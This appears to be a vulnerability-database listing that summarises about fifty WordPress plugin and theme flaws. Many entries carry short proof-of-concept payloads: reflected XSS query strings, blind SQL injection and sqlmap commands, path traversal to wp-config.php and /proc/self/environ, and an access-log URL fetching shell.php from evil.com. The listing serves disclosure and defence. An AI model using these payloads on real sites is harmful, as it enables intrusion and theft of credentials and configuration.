Form Lightbox - Arbitrary Option Update Leading to Admin Account
This plugin is no longer in the WordPress repository; however, it is still in use on some sites. With this vulnerability an attacker can update any option in the WordPress database, which includes gaining admin access. It uses the file ajax.php, which contains the following line: updateoptio...
Dwnldr 1.0 - Unauthenticated Stored Cross-Site Scripting (XSS)
User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed. curl -A "User-Agent: alertdocument.cookie;" -O http:///?attachmentid=...
Real3D FlipBook <= 2.8 - Multiple Vulnerabilities
List of vulnerabilities: - Delete any file or directory from the server Unauthenticated - Upload images in Root directory Unauthenticated - Cross-Site Scripting XSS + POCExploit CodeCanyon Real3D FlipBook WordPress Plugin + http://codecanyon.net/item/real3d-flipbook-wordpress-plugin/6942587 +...
Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Upload and Download
The cherry-plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in an attacker uploading backdoor shell scripts or downloading the wp-config.php file. Upload: The following file...
Contus Video Comments - Unauthenticated Remote JPG File Upload
The contus-video-comments WordPress plugin was affected by an Unauthenticated Remote JPG File Upload security vulnerability. curl --data @image.jpg "http://www.example.com/wp-content/plugins/contus-video-comments/save.php?id=../image"...
CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)
A Stored Cross-Site Scripting vulnerability was reported by the author to CM Ad Plugins, under which an unprivileged user can trigger a Stored XSS to perform malicious actions, or any attacker could send a crafted link (CSRF) that triggers the Stored XSS. 1 Go to CM Ad Changer - Campaigns 2 Create a Campaign...
WP Mobile Detector <= 3.5 - Arbitrary File Upload
The wp-mobile-detector WordPress plugin was affected by an Arbitrary File Upload security vulnerability. As seen in access logs: http://www.example.com/wp-content/plugins/wp-mobile-detector/resize.php?src=https://www.evil.com/shell.php...
Stream <= 3.0.5 - Unauthenticated Events Export
The Stream WordPress plugin allows unauthenticated users to export CSV or JSON of recent events. The code only checks to see if the proper GET variables are passed to a valid backend WordPress handler and will happily export logged entries. Reported to maintainers on 5/25/2016 and new version...
brafton WordPress Plugin <=3.4.7 - Reflected XSS
Title: brafton WordPress Plugin XSS Exploit Title: Vulnerability XSS in brafton WordPress Plugin Date: Fri May 20 2016 Reported Date: Fri May 20 2016 Vendor Homepage: http://www.brafton.com/support/wordpress/ Version: v3.3.10 – January 2016 Software Link:...
Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)
The tera-charts WordPress plugin was affected by an Unauthenticated Cross-Site Scripting XSS security vulnerability. http://www.example.com/tera-charts/charts/treemap.php?fn=";alert1;"&userid=1...
safe-editor <= 1.1 - Unauthenticated CSS/JS-injection
When saving JS/CSS in this plugin then both private and public ajax-hooks are being used. Because of this anyone can post JS/CSS that are saved to the db and printed to the head and footer portion of the page. In the file "index.php" in root folder on line 188 and 189 you can see that both privat...
Truemag Theme - Unauthenticated Reflected Cross-Site Scripting (XSS)
The truemag WordPress theme was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://WP/?s="%20alertdocument.cookie...
The Events Calendar <= 4.1.1 - Open Redirect
The problem is located in the "tribe-bar-view" parameter that can be used to redirect a user to an arbitrary website. Timeline 2016-04-04 : Initial contact with Modern Tribe 2016-04-05 : Modern Tribe confirms the report 2016-04-07 : Modern Tribe publishes a new version 4.1.1.1 that resolves the...
e-search <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The e-search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/e-search/tmpl/dateselect.php?date-from="alert1;alert1;"...
WHIZZ <= 1.0.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WHIZZ WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="alert1;"...
Admin Font Editor <= 1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The admin-font-editor WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/admin-font-editor/css.php?size="alert1;"...
Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-gallery WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="alert1;"...
anti-plagiarism <= 3.60 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The anti-plagiarism WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/anti-plagiarism/js.php?m="alert1;"...
MiniMax <= 2.0.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The page-layout-builder WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layoutsettingsid="alert1;"...
defa-online-image-protector <= 3.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The defa-online-image-protector WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/defa-online-image-protector/redirect.php?r="alert1;"...
S3 Video Plugin <= 0.983 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The s3-video WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/s3-video/views/video-management/previewvideo.php?media="alert1;"...
Easy Contact Form Builder <= 1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The tidio-form WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/tidio-form/popup-insert-help.php?formId="alert1;"...
Hero Maps Pro <= 2.1.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hero-maps-pro WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="alert1;"...
AJAX Random Post <= 2.00 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The ajax-random-post WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/ajax-random-post/js.php?interval="alert1;"...
HDW WordPress Video Gallery <= 1.2 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The hdw-tube WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/hdw-tube/playlist.php?playlist="alert1;alert1;"...
Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The Infusionsoft Gravity Forms Add-on WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="alert1;"...
WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The WPSOLR - Elasticsearch and Solr search WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability...
MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The MW Font Changer WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/parsi-font/css.php?size="alert1;"...
New Year Firework <= 1.1.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The new-year-firework WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/new-year-firework/firework/index.php?text="alert1;"...
Indexisto WordPress Site Search <= 1.0.5 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The indexisto WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexistoindex="alert1;"...
WP Multiple Meta Box 1.0 - Authenticated Blind SQL Injection
The multi-meta-box WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. http://www.example.com/wp-admin/admin.php?page=multimetaboxlisting&action=edit&id=1 AND SELECT FROM SELECTSLEEP5Etmx...
Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass
With the plugin "Stop User Enumeration 1.3.3" installed, it is possible to bypass it and obtain usernames. Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1...
Cerber Limit Login Attempts <= 2.0.1.6 - Unauthenticated Stored XSS
If the option "I'm behind a proxy" is enabled, the visitor IP is read from the X-Forwarded-For header, then stored and printed in the admin panel without any sanitization or validation. Set the X-Forwarded-For header to alert1, and perform an incorrect login...
Anti-Malware Security & Brute-Force Firewall <= 4.15.42 - XSS & CSRF
The Anti-Malware Security and Brute-Force Firewall WordPress plugin was affected by an XSS & CSRF security vulnerability. An XSS vulnerability in https://wordpress.org/plugins/gotmls/ has been identified. While I scanned a site with that plugin, I had a file '".png and it was skipped, but the result was...
Memphis Document Library Plugin <= 3.1.5 - Arbitrary File Download
The function "mdocsimgpreview" is in charge of downloading image previews previously uploaded by the administrator, but it does not sanitize the file path being downloaded, thus allowing arbitrary files on the file system to be downloaded. The vulnerable GET parameter is "mdocs-img-preview". The...
ABtest - File Inclusion
The abtest WordPress plugin was affected by a File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/abtest/abtestadmin.php?action=../../../../../../../../../../../../../../../proc/self/environ%00...
Nextend Facebook Connect <= 1.5.7 - Cross-Site Request Forgery (CSRF)
The Nextend Social Login and Register WordPress plugin was affected by a Cross-Site Request Forgery CSRF security vulnerability...
Ocim MP3 Plugin - Unauthenticated Reflected Cross-Site Scripting (XSS)
Credits to: Soufiane Boussali http://www.example.com/wp-content/plugins/ocim-mp3/source/pages.php?id=XSSPayload...
InstaLinker <= 1.1.1 - Reflected Cross-Site Scripting (XSS)
Due to a lack of input sanitization in the includes/instalinker-admin-preview.php file, it is possible to utilise a reflected XSS vector to run a script in the target user's browser and potentially compromise the WordPress installation...
Sola Support Ticket <= 3.12 - XSS & Configuration Change
Any logged-in user with any role and any form of access to wp-admin can update plugin settings, including allowing HTML to be parsed. One can also change any notification message to include JS, which can then be used to obtain information by forgery. Make a POST request to /wp-admin with parameters...
IMPress Listings <= 2.0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The IMPress Listings WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting XSS security vulnerability. IMPress Listings XSS Demo alertdocument.cookie;...
Commentator <= 2.5.2 - Reflected Cross-Site Scripting (XSS)
The commentator WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-admin/admin-ajax.php?action=commentatorsocialsignin&provider=facebook"...
WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
http://www.example.com/wp-admin/customize.php?theme= Source: https://twitter.com/brutelogic/status/685105483397619713...
YAWPP <= 1.2.2 - Unauthenticated Stored Cross-Site Scripting (XSS)
The yawpp WordPress plugin was affected by an Unauthenticated Stored Cross-Site Scripting XSS security vulnerability. POST /wordpress-4.3/?p=4 HTTP/1.1 Host: wp.lab User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.10; rv:42.0 Gecko/20100101 Firefox/42.0 Accept:...
Advanced uploader - Local File Inclusion
The Advanced uploader WordPress plugin was affected by a Local File Inclusion security vulnerability. http://www.example.com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00...
Auto ThickBox Plus <= 1.9 - Reflected Cross-Site Scripting (XSS)
The auto-thickbox-plus WordPress plugin was affected by a Reflected Cross-Site Scripting XSS security vulnerability. http://www.example.com/wp-content/plugins/auto-thickbox-plus/download.min.php?file=%3Cscript%3Ealert%281%29%3C/script%3E...
WP Fastest Cache <= 0.8.4.8 - Blind SQL Injection
According to the researcher, for this vulnerability to be present WP-Polls plugin also needs to be installed...
WordPress File Upload <= 3.4.0 - Unauthenticated Malicious File Upload
The WordPress plugin wp-file-upload does not adequately check the file type before allowing a file to be uploaded. It also uploads files with execute permissions, allowing malicious payloads to be uploaded. 1. Install wp-file-upload on a WordPress site and activate it. 2. Create an upload form on a...
wp-championship <= 5.8 - Authenticated Blind SQL Injection
The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability. $ sqlmap -u 'http://www.example.com/wp-admin/wp-championship/csadminusers.php&userid=' --data="isadmin=1&user" --cookie=AUTHCOOKIEHERE --level=5 --risk=3...
Recent Posts Widget Extended <= 0.9.9.3 - Authenticated XSS (multisite)
XSS in the Recent Posts Widget Extended plugin allows single-site admins to change the network admin's password with the simple CSRF described in the POC field above. This vulnerability is currently unpatched. 1. Log in as a single-site administrator 2. Add the Recent Posts Extended Widget to some widget area 3. Add...